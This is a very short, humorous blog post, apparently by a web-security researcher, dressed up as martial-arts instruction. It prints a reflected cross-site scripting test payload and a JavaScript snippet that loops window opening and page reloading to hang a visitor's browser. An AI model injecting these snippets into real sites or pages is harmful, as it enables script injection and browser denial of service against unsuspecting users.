Published 18 years 6 months ago • Last updated March 22, 2025 • ⏱️ < 1 min read
[Blocked Image]
Hello my student here I'll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:-
<pre lang="javascript"> "><script>alert(/XSS PUNCH!/)</script> </pre>Then you can respond with the crouching tab hidden dos move:-
<pre lang="javascript"> self.location = "javascript:window.open('javascript:document.clear(); document.open();document.close();self.location=self.location')"; </pre>This move can frustrate your opponent into submission.